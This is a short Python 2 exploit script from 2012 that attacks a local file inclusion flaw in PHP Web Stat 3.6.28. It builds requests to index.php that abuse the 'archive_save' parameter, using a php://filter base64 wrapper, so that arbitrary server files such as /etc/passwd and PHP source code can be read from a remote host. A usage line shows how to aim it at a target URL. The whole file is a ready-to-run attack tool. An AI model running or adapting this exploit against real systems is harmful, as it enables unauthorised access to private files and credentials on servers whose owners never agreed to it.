phpstat.py

#!/usr/bin/python

# Local/Remote file inclusion in phpstats

import sys
from urllib2 import urlopen
from urllib import basejoin,  urlencode
from base64 import b64decode

class PHPStatExploit:
    """
    Exploit local file inclusion in PHP Web Stat 3.6.28 (and maybe other versions)
    @url: path to the directory where php web stat is installed
    """

    def __init__(self, url):
        self.url = url
        self.target = 'index.php'
        self.vector = {'parameter': 'finished',  'archive_save': ''}
        self.b46encode = 'php://filter/convert.base64-encode/resource=%s'
        self.split = '<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">'

    def __get_payload(self, data, decode=True):
        if not self.split in data:
            return None

        data = data[:data.find(self.split)].strip()
        if decode:
            return b64decode(data)   
        else:
            return data

    def readfile(self, filename, encode = True):
        """
        read a file from the remote system
        @filename: absolute path to the file to read (ex: /etc/passwd)
        @encode: encode the output base64 (because the 'require' function is triggered, 
        you need this to read php code from the server. otherwise it is executed)
        """
        
        if encode:
            self.vector['archive_save'] = self.b46encode % (filename, )
        else:
            self.vector['archive_save'] = filename
            
        resp = urlopen("%s?%s" % (basejoin(self.url, self.target), urlencode(self.vector)))
        data = self.__get_payload(resp.read(), decode = encode)
        
        if not data:
            raise ValueError('No data returned')
            
        return data

def usage(me):
    print "[-] usage: %s <phpstats-url> <file>" % (me, )
    print "[-] example: %s http://example.com/phpstat/ /etc/passwd"
    sys.exit(1)

if __name__ == '__main__':
    print "[*] phpstats local file inclusion - 2012 - shinnok@crapworks.de"
    if len(sys.argv) < 3:
        usage(sys.argv[0])

    url, filename = sys.argv[1:3]

    print "[+] reading %s from server ..." % (filename, )
    exploit = PHPStatExploit(url)
    try:
        data = exploit.readfile(filename,  encode=False)
    except ValueError,  err:
        print "[-] Error reading file: %s" % (err.message, )
    else:
        print data